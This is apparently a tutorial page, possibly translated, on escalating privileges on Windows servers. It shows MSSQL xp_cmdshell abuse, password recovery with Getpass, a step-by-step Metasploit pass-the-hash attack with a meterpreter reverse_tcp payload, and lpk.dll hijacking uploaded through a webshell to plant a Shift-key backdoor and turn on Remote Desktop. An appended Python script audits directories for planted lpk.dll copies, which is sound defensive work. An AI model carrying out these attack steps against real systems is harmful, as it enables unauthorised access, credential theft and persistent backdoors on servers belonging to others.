(i) MSSQL privilege escalation
Prerequisite: obtain the password of the SA account, the highest-privilege user of the MSSQL database.
MSSQL default port: 1433
MSSQL highest-privilege user: SA
Once the SA password is obtained, connect to the database directly with a client tool.
MSSQL ships with the xp_cmdshell stored procedure, which is used to execute cmd commands.
(ii) Getpass privilege escalation
A tool that recovers the account passwords of the users on a machine.
(iii) Pass-the-hash intrusion with MSF
Hash algorithm: the form in which Windows stores (hashes) its passwords.
MSF download: http://www.rapid7.com/products/metasploit/download.jsp
The demo below uses Kali.
MSF usage:
msfconsole                                  // start the console
use exploit/windows/smb/psexec              // select the module
show options                                // view the module's option properties
set PAYLOAD windows/meterpreter/reverse_tcp // set the payload
show targets                                // view the module's supported targets
set LHOST                                   // set the local (listener) address
set RHOST 192.168.0.254                     // set the target host address
set SMBUser Administrator                   // set the user name
set SMBPass XXX                             // set the password hash in place of the password
How is the target host's hash obtained? It can be dumped with the PWDUMP7 tool.
Just copy the hash line from its output.
exploit                                     // launch the attack
A shell is returned and commands can now be executed.
(iv) LPK privilege escalation
Trigger: an EXE in the directory is executed. The mechanism is that before an executable is loaded, Windows checks whether lpk.dll exists in the executable's own directory; if it does, that copy is loaded, otherwise the DLL under the System32 directory is used.
Activation scenario: connect via Remote Desktop on port 3389 (press Shift repeatedly, then press the hotkey).
Escalation scheme: generate lpk.dll, upload it to a program directory via a webshell, and wait for an administrator to run an EXE in that directory.
Run the LPK sethc tool and select the two-key start option; the values for key 2 and key 3 are fixed key codes built into LPK sethc, for example 65 and 66 correspond to A and B.
Then click Build, upload the generated lpk.dll to any directory, and run any EXE in that directory; the Shift backdoor is installed automatically.
I generated it in the software's own directory, then clicked to run the software.
Then connect remotely and press the Shift key five times; the following prompt appears.
Then press the combination keys at the same time (the ones set to 65 and 66, i.e. A and B); the following password box appears.
Enter the password and you reach the following interface!!!
It can also be used to run a program, for example to enable 3389; select this option when generating lpk.dll.
Generate lpk.dll and place it in any directory; before the program is executed, Remote Desktop is off.
Then execute the EXE and you find that Remote Desktop has been enabled.
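As an added defensive check (not part of the original page): the lpk.dll technique above works because Windows loads a DLL from the executable's own directory before falling back to System32. The Python script below audits a directory tree for copies of lpk.dll that sit outside the Windows system directories and lists the executables beside them; the directory layout it scans is constructed for the demo, and the system-directory list is an assumption.

```python
# Added example (not from the original page): audit a directory tree for
# lpk.dll copies planted beside executables. The demo tree is constructed.
import os
import tempfile
from pathlib import Path

HIJACK_NAMES = {"lpk.dll"}                                # DLL name from the page
SYSTEM_DIRS = ("windows\\system32", "windows\\syswow64")  # legitimate homes (assumed)

def is_system_dir(path):
    """True if path lies under one of the Windows system directories."""
    p = path.replace("/", "\\").lower() + "\\"
    return any(s + "\\" in p for s in SYSTEM_DIRS)

def find_planted_lpk(root):
    """One finding per stray lpk.dll, with the EXEs in the same directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        by_lower = {f.lower(): f for f in files}
        hits = HIJACK_NAMES & set(by_lower)
        if not hits or is_system_dir(dirpath):
            continue
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        for name in sorted(hits):
            findings.append({
                "dll": os.path.join(dirpath, by_lower[name]),
                "executables_affected": exes,
                "severity": "high" if exes else "medium",  # next to an EXE = live hijack
            })
    return findings

def build_demo_tree():
    """Constructed layout: a legitimate copy in System32 and one planted copy."""
    root = tempfile.mkdtemp(prefix="lpk_audit_")
    layout = {
        "Windows/System32/lpk.dll": b"legitimate system copy",
        "Program Files/SomeApp/SomeApp.exe": b"MZ",
        "Program Files/SomeApp/lpk.dll": b"planted copy",
        "Users/Public/readme.txt": b"unrelated file",
    }
    for rel, data in layout.items():
        full = Path(root, *rel.split("/"))
        full.parent.mkdir(parents=True, exist_ok=True)
        full.write_bytes(data)
    return root

if __name__ == "__main__":
    for f in find_planted_lpk(build_demo_tree()):
        exes = ", ".join(f["executables_affected"]) or "none"
        print(f"[{f['severity']}] {f['dll']} (executables beside it: {exes})")
```

On a real host, point find_planted_lpk at the web root or program directories where an upload could land; the System32 copy is deliberately skipped so only the stray copy is reported.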
Privilege escalation collection (ii): Windows server privilege escalation via MSSQL, Getpass, pass-the-hash, and LPK